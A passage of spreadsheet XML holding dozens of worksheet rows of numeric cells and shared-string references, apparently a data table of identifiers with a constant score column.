      <c r="B22245" s="2">
        <v>1.546151E7</v>
      </c>
      <c r="C22245" s="2" t="s">
        <v>21482</v>
      </c>
      <c r="D22245" s="2">
        <v>1.0</v>
      </c>
      <c r="E22245" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22245" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22246" ht="15.75" customHeight="1">
      <c r="A22246" s="1">
        <v>325.0</v>
      </c>
      <c r="B22246" s="2">
        <v>1.5730182E7</v>
      </c>
      <c r="C22246" s="2" t="s">
        <v>21483</v>
      </c>
      <c r="D22246" s="2">
        <v>1.0</v>
      </c>
      <c r="E22246" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22246" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22247" ht="15.75" customHeight="1">
      <c r="A22247" s="1">
        <v>327.0</v>
      </c>
      <c r="B22247" s="2">
        <v>1.5735264E7</v>
      </c>
      <c r="C22247" s="2" t="s">
        <v>21484</v>
      </c>
      <c r="D22247" s="2">
        <v>1.0</v>
      </c>
      <c r="E22247" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22247" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22248" ht="15.75" customHeight="1">
      <c r="A22248" s="1">
        <v>383.0</v>
      </c>
      <c r="B22248" s="2">
        <v>1.6378646E7</v>
      </c>
      <c r="C22248" s="2" t="s">
        <v>21485</v>
      </c>
      <c r="D22248" s="2">
        <v>1.0</v>
      </c>
      <c r="E22248" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22248" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22249" ht="15.75" customHeight="1">
      <c r="A22249" s="1">
        <v>389.0</v>
      </c>
      <c r="B22249" s="2">
        <v>1.6449165E7</v>
      </c>
      <c r="C22249" s="2" t="s">
        <v>21486</v>
      </c>
      <c r="D22249" s="2">
        <v>1.0</v>
      </c>
      <c r="E22249" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22249" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22250" ht="15.75" customHeight="1">
      <c r="A22250" s="1">
        <v>450.0</v>
      </c>
      <c r="B22250" s="2">
        <v>1.7190175E7</v>
      </c>
      <c r="C22250" s="2" t="s">
        <v>21487</v>
      </c>
      <c r="D22250" s="2">
        <v>1.0</v>
      </c>
      <c r="E22250" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22250" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22251" ht="15.75" customHeight="1">
      <c r="A22251" s="1">
        <v>677.0</v>
      </c>
      <c r="B22251" s="2">
        <v>2.0268316E7</v>
      </c>
      <c r="C22251" s="2" t="s">
        <v>21488</v>
      </c>
      <c r="D22251" s="2">
        <v>1.0</v>
      </c>
      <c r="E22251" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22251" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22252" ht="15.75" customHeight="1">
      <c r="A22252" s="1">
        <v>774.0</v>
      </c>
      <c r="B22252" s="2">
        <v>2.1077992E7</v>
      </c>
      <c r="C22252" s="2" t="s">
        <v>21489</v>
      </c>
      <c r="D22252" s="2">
        <v>1.0</v>
      </c>
      <c r="E22252" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22252" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22253" ht="15.75" customHeight="1">
      <c r="A22253" s="1">
        <v>831.0</v>
      </c>
      <c r="B22253" s="2">
        <v>2.1567414E7</v>
      </c>
      <c r="C22253" s="2" t="s">
        <v>21490</v>
      </c>
      <c r="D22253" s="2">
        <v>1.0</v>
      </c>
      <c r="E22253" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22253" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22254" ht="15.75" customHeight="1">
      <c r="A22254" s="1">
        <v>857.0</v>
      </c>
      <c r="B22254" s="2">
        <v>2.1749773E7</v>
      </c>
      <c r="C22254" s="2" t="s">
        <v>21491</v>
      </c>
      <c r="D22254" s="2">
        <v>1.0</v>
      </c>
      <c r="E22254" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22254" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22255" ht="15.75" customHeight="1">
      <c r="A22255" s="1">
        <v>869.0</v>
      </c>
      <c r="B22255" s="2">
        <v>2.1869936E7</v>
      </c>
      <c r="C22255" s="2" t="s">
        <v>21492</v>
      </c>
      <c r="D22255" s="2">
        <v>1.0</v>
      </c>
      <c r="E22255" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22255" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22256" ht="15.75" customHeight="1">
      <c r="A22256" s="1">
        <v>874.0</v>
      </c>
      <c r="B22256" s="2">
        <v>2.1900915E7</v>
      </c>
      <c r="C22256" s="2" t="s">
        <v>21493</v>
      </c>
      <c r="D22256" s="2">
        <v>1.0</v>
      </c>
      <c r="E22256" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22256" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22257" ht="15.75" customHeight="1">
      <c r="A22257" s="1">
        <v>1006.0</v>
      </c>
      <c r="B22257" s="2">
        <v>2.305504E7</v>
      </c>
      <c r="C22257" s="2" t="s">
        <v>21494</v>
      </c>
      <c r="D22257" s="2">
        <v>1.0</v>
      </c>
      <c r="E22257" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22257" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22258" ht="15.75" customHeight="1">
      <c r="A22258" s="1">
        <v>1079.0</v>
      </c>
      <c r="B22258" s="2">
        <v>2.3630095E7</v>
      </c>
      <c r="C22258" s="2" t="s">
        <v>21495</v>
      </c>
      <c r="D22258" s="2">
        <v>1.0</v>
      </c>
      <c r="E22258" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22258" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22259" ht="15.75" customHeight="1">
      <c r="A22259" s="1">
        <v>1088.0</v>
      </c>
      <c r="B22259" s="2">
        <v>2.3767814E7</v>
      </c>
      <c r="C22259" s="2" t="s">
        <v>21496</v>
      </c>
      <c r="D22259" s="2">
        <v>1.0</v>
      </c>
      <c r="E22259" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22259" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22260" ht="15.75" customHeight="1">
      <c r="A22260" s="1">
        <v>1141.0</v>
      </c>
      <c r="B22260" s="2">
        <v>2.428023E7</v>
      </c>
      <c r="C22260" s="2" t="s">
        <v>21497</v>
      </c>
      <c r="D22260" s="2">
        <v>1.0</v>
      </c>
      <c r="E22260" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22260" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22261" ht="15.75" customHeight="1">
      <c r="A22261" s="1">
        <v>1174.0</v>
      </c>
      <c r="B22261" s="2">
        <v>2.4623765E7</v>
      </c>
      <c r="C22261" s="2" t="s">
        <v>21498</v>
      </c>
      <c r="D22261" s="2">
        <v>1.0</v>
      </c>
      <c r="E22261" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22261" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22262" ht="15.75" customHeight="1">
      <c r="A22262" s="1">
        <v>1213.0</v>
      </c>
      <c r="B22262" s="2">
        <v>2.486137E7</v>
      </c>
      <c r="C22262" s="2" t="s">
        <v>21499</v>
      </c>
      <c r="D22262" s="2">
        <v>1.0</v>
      </c>
      <c r="E22262" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22262" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22263" ht="15.75" customHeight="1">
      <c r="A22263" s="1">
        <v>1271.0</v>
      </c>
      <c r="B22263" s="2">
        <v>2.5301229E7</v>
      </c>
      <c r="C22263" s="2" t="s">
        <v>21500</v>
      </c>
      <c r="D22263" s="2">
        <v>1.0</v>
      </c>
      <c r="E22263" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22263" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22264" ht="15.75" customHeight="1">
      <c r="A22264" s="1">
        <v>1356.0</v>
      </c>
      <c r="B22264" s="2">
        <v>2.5970903E7</v>
      </c>
      <c r="C22264" s="2" t="s">
        <v>21501</v>
      </c>
      <c r="D22264" s="2">
        <v>1.0</v>
      </c>
      <c r="E22264" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22264" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22265" ht="15.75" customHeight="1">
      <c r="A22265" s="1">
        <v>1358.0</v>
      </c>
      <c r="B22265" s="2">
        <v>2.5970903E7</v>
      </c>
      <c r="C22265" s="2" t="s">
        <v>21502</v>
      </c>
      <c r="D22265" s="2">
        <v>1.0</v>
      </c>
      <c r="E22265" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22265" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22266" ht="15.75" customHeight="1">
      <c r="A22266" s="1">
        <v>1431.0</v>
      </c>
      <c r="B22266" s="2">
        <v>2.6653399E7</v>
      </c>
      <c r="C22266" s="2" t="s">
        <v>21503</v>
      </c>
      <c r="D22266" s="2">
        <v>1.0</v>
      </c>
      <c r="E22266" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22266" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22267" ht="15.75" customHeight="1">
      <c r="A22267" s="1">
        <v>1468.0</v>
      </c>
      <c r="B22267" s="2">
        <v>2.695412E7</v>
      </c>
      <c r="C22267" s="2" t="s">
        <v>21504</v>
      </c>
      <c r="D22267" s="2">
        <v>1.0</v>
      </c>
      <c r="E22267" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22267" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22268" ht="15.75" customHeight="1">
      <c r="A22268" s="1">
        <v>1484.0</v>
      </c>
      <c r="B22268" s="2">
        <v>2.7169937E7</v>
      </c>
      <c r="C22268" s="2" t="s">
        <v>21505</v>
      </c>
      <c r="D22268" s="2">
        <v>1.0</v>
      </c>
      <c r="E22268" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22268" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22269" ht="15.75" customHeight="1">
      <c r="A22269" s="1">
        <v>1546.0</v>
      </c>
      <c r="B22269" s="2">
        <v>2.75731E7</v>
      </c>
      <c r="C22269" s="2" t="s">
        <v>21506</v>
      </c>
      <c r="D22269" s="2">
        <v>1.0</v>
      </c>
      <c r="E22269" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22269" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22270" ht="15.75" customHeight="1">
      <c r="A22270" s="1">
        <v>1717.0</v>
      </c>
      <c r="B22270" s="2">
        <v>2.8615163E7</v>
      </c>
      <c r="C22270" s="2" t="s">
        <v>21507</v>
      </c>
      <c r="D22270" s="2">
        <v>1.0</v>
      </c>
      <c r="E22270" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22270" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22271" ht="15.75" customHeight="1">
      <c r="A22271" s="1">
        <v>1756.0</v>
      </c>
      <c r="B22271" s="2">
        <v>2.8903244E7</v>
      </c>
      <c r="C22271" s="2" t="s">
        <v>21508</v>
      </c>
      <c r="D22271" s="2">
        <v>1.0</v>
      </c>
      <c r="E22271" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22271" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22272" ht="15.75" customHeight="1">
      <c r="A22272" s="1">
        <v>1776.0</v>
      </c>
      <c r="B22272" s="2">
        <v>2.9028157E7</v>
      </c>
      <c r="C22272" s="2" t="s">
        <v>21509</v>
      </c>
      <c r="D22272" s="2">
        <v>1.0</v>
      </c>
      <c r="E22272" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22272" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22273" ht="15.75" customHeight="1">
      <c r="A22273" s="1">
        <v>2197.0</v>
      </c>
      <c r="B22273" s="2">
        <v>3.2025109E7</v>
      </c>
      <c r="C22273" s="2" t="s">
        <v>21510</v>
      </c>
      <c r="D22273" s="2">
        <v>1.0</v>
      </c>
      <c r="E22273" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22273" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22274" ht="15.75" customHeight="1">
      <c r="A22274" s="1">
        <v>2301.0</v>
      </c>
      <c r="B22274" s="2">
        <v>3.2704496E7</v>
      </c>
      <c r="C22274" s="2" t="s">
        <v>21511</v>
      </c>
      <c r="D22274" s="2">
        <v>1.0</v>
      </c>
      <c r="E22274" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22274" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22275" ht="15.75" customHeight="1">
      <c r="A22275" s="1">
        <v>2311.0</v>
      </c>
      <c r="B22275" s="2">
        <v>3.2828332E7</v>
      </c>
      <c r="C22275" s="2" t="s">
        <v>21512</v>
      </c>
      <c r="D22275" s="2">
        <v>1.0</v>
      </c>
      <c r="E22275" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22275" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22276" ht="15.75" customHeight="1">
      <c r="A22276" s="1">
        <v>2347.0</v>
      </c>
      <c r="B22276" s="2">
        <v>3.3060256E7</v>
      </c>
      <c r="C22276" s="2" t="s">
        <v>21513</v>
      </c>
      <c r="D22276" s="2">
        <v>1.0</v>
      </c>
      <c r="E22276" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22276" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22277" ht="15.75" customHeight="1">
      <c r="A22277" s="1">
        <v>2411.0</v>
      </c>
      <c r="B22277" s="2">
        <v>3.3483188E7</v>
      </c>
      <c r="C22277" s="2" t="s">
        <v>21514</v>
      </c>
      <c r="D22277" s="2">
        <v>1.0</v>
      </c>
      <c r="E22277" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22277" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22278" ht="15.75" customHeight="1">
      <c r="A22278" s="1">
        <v>2623.0</v>
      </c>
      <c r="B22278" s="2">
        <v>3.4497323E7</v>
      </c>
      <c r="C22278" s="2" t="s">
        <v>21515</v>
      </c>
      <c r="D22278" s="2">
        <v>1.0</v>
      </c>
      <c r="E22278" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22278" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22279" ht="15.75" customHeight="1">
      <c r="A22279" s="1">
        <v>2654.0</v>
      </c>
      <c r="B22279" s="2">
        <v>3.4686888E7</v>
      </c>
      <c r="C22279" s="2" t="s">
        <v>21516</v>
      </c>
      <c r="D22279" s="2">
        <v>1.0</v>
      </c>
      <c r="E22279" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22279" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22280" ht="15.75" customHeight="1">
      <c r="A22280" s="1">
        <v>2715.0</v>
      </c>
      <c r="B22280" s="2">
        <v>3.4914121E7</v>
      </c>
      <c r="C22280" s="2" t="s">
        <v>21517</v>
      </c>
      <c r="D22280" s="2">
        <v>1.0</v>
      </c>
      <c r="E22280" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22280" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22281" ht="15.75" customHeight="1">
      <c r="A22281" s="1">
        <v>2719.0</v>
      </c>
      <c r="B22281" s="2">
        <v>3.4933907E7</v>
      </c>
      <c r="C22281" s="2" t="s">
        <v>21518</v>
      </c>
      <c r="D22281" s="2">
        <v>1.0</v>
      </c>
      <c r="E22281" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22281" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22282" ht="15.75" customHeight="1">
      <c r="A22282" s="1">
        <v>2720.0</v>
      </c>
      <c r="B22282" s="2">
        <v>3.4933907E7</v>
      </c>
      <c r="C22282" s="2" t="s">
        <v>21519</v>
      </c>
      <c r="D22282" s="2">
        <v>1.0</v>
      </c>
      <c r="E22282" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22282" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22283" ht="15.75" customHeight="1">
      <c r="A22283" s="1">
        <v>2735.0</v>
      </c>
      <c r="B22283" s="2">
        <v>3.4998264E7</v>
      </c>
      <c r="C22283" s="2" t="s">
        <v>21520</v>
      </c>
      <c r="D22283" s="2">
        <v>1.0</v>
      </c>
      <c r="E22283" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22283" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22284" ht="15.75" customHeight="1">
      <c r="A22284" s="1">
        <v>2769.0</v>
      </c>
      <c r="B22284" s="2">
        <v>3.5144945E7</v>
      </c>
      <c r="C22284" s="2" t="s">
        <v>21521</v>
      </c>
      <c r="D22284" s="2">
        <v>1.0</v>
      </c>
      <c r="E22284" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22284" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22285" ht="15.75" customHeight="1">
      <c r="A22285" s="1">
        <v>2774.0</v>
      </c>
      <c r="B22285" s="2">
        <v>3.5161316E7</v>
      </c>
      <c r="C22285" s="2" t="s">
        <v>21522</v>
      </c>
      <c r="D22285" s="2">
        <v>1.0</v>
      </c>
      <c r="E22285" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22285" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22286" ht="15.75" customHeight="1">
      <c r="A22286" s="1">
        <v>2797.0</v>
      </c>
      <c r="B22286" s="2">
        <v>3.5269935E7</v>
      </c>
      <c r="C22286" s="2" t="s">
        <v>21523</v>
      </c>
      <c r="D22286" s="2">
        <v>1.0</v>
      </c>
      <c r="E22286" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22286" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22287" ht="15.75" customHeight="1">
      <c r="A22287" s="1">
        <v>2800.0</v>
      </c>
      <c r="B22287" s="2">
        <v>3.5282022E7</v>
      </c>
      <c r="C22287" s="2" t="s">
        <v>21524</v>
      </c>
      <c r="D22287" s="2">
        <v>1.0</v>
      </c>
      <c r="E22287" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22287" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22288" ht="15.75" customHeight="1">
      <c r="A22288" s="1">
        <v>2852.0</v>
      </c>
      <c r="B22288" s="2">
        <v>3.5504809E7</v>
      </c>
      <c r="C22288" s="2" t="s">
        <v>21525</v>
      </c>
      <c r="D22288" s="2">
        <v>1.0</v>
      </c>
      <c r="E22288" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22288" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22289" ht="15.75" customHeight="1">
      <c r="A22289" s="1">
        <v>2975.0</v>
      </c>
      <c r="B22289" s="2">
        <v>3.6105348E7</v>
      </c>
      <c r="C22289" s="2" t="s">
        <v>21526</v>
      </c>
      <c r="D22289" s="2">
        <v>1.0</v>
      </c>
      <c r="E22289" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22289" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22290" ht="15.75" customHeight="1">
      <c r="A22290" s="1">
        <v>3106.0</v>
      </c>
      <c r="B22290" s="2">
        <v>3.6744379E7</v>
      </c>
      <c r="C22290" s="2" t="s">
        <v>21527</v>
      </c>
      <c r="D22290" s="2">
        <v>1.0</v>
      </c>
      <c r="E22290" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22290" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22291" ht="15.75" customHeight="1">
      <c r="A22291" s="1">
        <v>3228.0</v>
      </c>
      <c r="B22291" s="2">
        <v>3.7340848E7</v>
      </c>
      <c r="C22291" s="2" t="s">
        <v>21528</v>
      </c>
      <c r="D22291" s="2">
        <v>1.0</v>
      </c>
      <c r="E22291" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22291" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22292" ht="15.75" customHeight="1">
      <c r="A22292" s="1">
        <v>3230.0</v>
      </c>
      <c r="B22292" s="2">
        <v>3.734621E7</v>
      </c>
      <c r="C22292" s="2" t="s">
        <v>21529</v>
      </c>
      <c r="D22292" s="2">
        <v>1.0</v>
      </c>
      <c r="E22292" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22292" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22293" ht="15.75" customHeight="1">
      <c r="A22293" s="1">
        <v>3316.0</v>
      </c>
      <c r="B22293" s="2">
        <v>3.7609309E7</v>
      </c>
      <c r="C22293" s="2" t="s">
        <v>21530</v>
      </c>
      <c r="D22293" s="2">
        <v>1.0</v>
      </c>
      <c r="E22293" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22293" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22294" ht="15.75" customHeight="1">
      <c r="A22294" s="1">
        <v>3348.0</v>
      </c>
      <c r="B22294" s="2">
        <v>3.776189E7</v>
      </c>
      <c r="C22294" s="2" t="s">
        <v>21531</v>
      </c>
      <c r="D22294" s="2">
        <v>1.0</v>
      </c>
      <c r="E22294" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22294" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22295" ht="15.75" customHeight="1">
      <c r="A22295" s="1">
        <v>3384.0</v>
      </c>
      <c r="B22295" s="2">
        <v>3.7950485E7</v>
      </c>
      <c r="C22295" s="2" t="s">
        <v>21532</v>
      </c>
      <c r="D22295" s="2">
        <v>1.0</v>
      </c>
      <c r="E22295" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22295" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22296" ht="15.75" customHeight="1">
      <c r="A22296" s="1">
        <v>3403.0</v>
      </c>
      <c r="B22296" s="2">
        <v>3.8031366E7</v>
      </c>
      <c r="C22296" s="2" t="s">
        <v>21533</v>
      </c>
      <c r="D22296" s="2">
        <v>1.0</v>
      </c>
      <c r="E22296" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22296" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22297" ht="15.75" customHeight="1">
      <c r="A22297" s="1">
        <v>3484.0</v>
      </c>
      <c r="B22297" s="2">
        <v>3.8404361E7</v>
      </c>
      <c r="C22297" s="2" t="s">
        <v>21534</v>
      </c>
      <c r="D22297" s="2">
        <v>1.0</v>
      </c>
      <c r="E22297" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22297" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22298" ht="15.75" customHeight="1">
      <c r="A22298" s="1">
        <v>3512.0</v>
      </c>
      <c r="B22298" s="2">
        <v>3.8555687E7</v>
      </c>
      <c r="C22298" s="2" t="s">
        <v>21535</v>
      </c>
      <c r="D22298" s="2">
        <v>1.0</v>
      </c>
      <c r="E22298" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22298" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22299" ht="15.75" customHeight="1">
      <c r="A22299" s="1">
        <v>3534.0</v>
      </c>
      <c r="B22299" s="2">
        <v>3.8680152E7</v>
      </c>
      <c r="C22299" s="2" t="s">
        <v>21536</v>
      </c>
      <c r="D22299" s="2">
        <v>1.0</v>
      </c>
      <c r="E22299" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22299" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22300" ht="15.75" customHeight="1">
      <c r="A22300" s="1">
        <v>3576.0</v>
      </c>
      <c r="B22300" s="2">
        <v>3.8966742E7</v>
      </c>
      <c r="C22300" s="2" t="s">
        <v>21537</v>
      </c>
      <c r="D22300" s="2">
        <v>1.0</v>
      </c>
      <c r="E22300" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22300" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22301" ht="15.75" customHeight="1">
      <c r="A22301" s="1">
        <v>4020.0</v>
      </c>
      <c r="B22301" s="2">
        <v>4.0950412E7</v>
      </c>
      <c r="C22301" s="2" t="s">
        <v>21538</v>
      </c>
      <c r="D22301" s="2">
        <v>1.0</v>
      </c>
      <c r="E22301" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22301" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22302" ht="15.75" customHeight="1">
      <c r="A22302" s="1">
        <v>4022.0</v>
      </c>
      <c r="B22302" s="2">
        <v>4.0965587E7</v>
      </c>
      <c r="C22302" s="2" t="s">
        <v>21539</v>
      </c>
      <c r="D22302" s="2">
        <v>1.0</v>
      </c>
      <c r="E22302" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22302" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22303" ht="15.75" customHeight="1">
      <c r="A22303" s="1">
        <v>4055.0</v>
      </c>
      <c r="B22303" s="2">
        <v>4.1118318E7</v>
      </c>
      <c r="C22303" s="2" t="s">
        <v>21540</v>
      </c>
      <c r="D22303" s="2">
        <v>1.0</v>
      </c>
      <c r="E22303" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22303" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22304" ht="15.75" customHeight="1">
      <c r="A22304" s="1">
        <v>4149.0</v>
      </c>
      <c r="B22304" s="2">
        <v>4.1420958E7</v>
      </c>
      <c r="C22304" s="2" t="s">
        <v>21541</v>
      </c>
      <c r="D22304" s="2">
        <v>1.0</v>
      </c>
      <c r="E22304" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22304" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22305" ht="15.75" customHeight="1">
      <c r="A22305" s="1">
        <v>4185.0</v>
      </c>
      <c r="B22305" s="2">
        <v>4.1567781E7</v>
      </c>
      <c r="C22305" s="2" t="s">
        <v>21542</v>
      </c>
      <c r="D22305" s="2">
        <v>1.0</v>
      </c>
      <c r="E22305" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22305" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22306" ht="15.75" customHeight="1">
      <c r="A22306" s="1">
        <v>4189.0</v>
      </c>
      <c r="B22306" s="2">
        <v>4.1576079E7</v>
      </c>
      <c r="C22306" s="2" t="s">
        <v>21543</v>
      </c>
      <c r="D22306" s="2">
        <v>1.0</v>
      </c>
      <c r="E22306" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22306" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22307" ht="15.75" customHeight="1">
      <c r="A22307" s="1">
        <v>4217.0</v>
      </c>
      <c r="B22307" s="2">
        <v>4.1708263E7</v>
      </c>
      <c r="C22307" s="2" t="s">
        <v>21544</v>
      </c>
      <c r="D22307" s="2">
        <v>1.0</v>
      </c>
      <c r="E22307" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22307" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22308" ht="15.75" customHeight="1">
      <c r="A22308" s="1">
        <v>4256.0</v>
      </c>
      <c r="B22308" s="2">
        <v>4.1816527E7</v>
      </c>
      <c r="C22308" s="2" t="s">
        <v>21545</v>
      </c>
      <c r="D22308" s="2">
        <v>1.0</v>
      </c>
      <c r="E22308" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22308" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22309" ht="15.75" customHeight="1">
      <c r="A22309" s="1">
        <v>4263.0</v>
      </c>
      <c r="B22309" s="2">
        <v>4.1847506E7</v>
      </c>
      <c r="C22309" s="2" t="s">
        <v>21546</v>
      </c>
      <c r="D22309" s="2">
        <v>1.0</v>
      </c>
      <c r="E22309" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22309" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22310" ht="15.75" customHeight="1">
      <c r="A22310" s="1">
        <v>4346.0</v>
      </c>
      <c r="B22310" s="2">
        <v>4.2085082E7</v>
      </c>
      <c r="C22310" s="2" t="s">
        <v>21547</v>
      </c>
      <c r="D22310" s="2">
        <v>1.0</v>
      </c>
      <c r="E22310" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22310" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22311" ht="15.75" customHeight="1">
      <c r="A22311" s="1">
        <v>4509.0</v>
      </c>
      <c r="B22311" s="2">
        <v>4.2586294E7</v>
      </c>
      <c r="C22311" s="2" t="s">
        <v>21548</v>
      </c>
      <c r="D22311" s="2">
        <v>1.0</v>
      </c>
      <c r="E22311" s="3" t="s">
        <v>18833</v>
      </c>
      <c r="F22311" s="2">
        <v>0.09748427672955975</v>
      </c>
    </row>
    <row r="22312" ht="15.75" customHeight="1">
      <c r="A22312" s="1">
        <v>4569.0</v>
      </c>
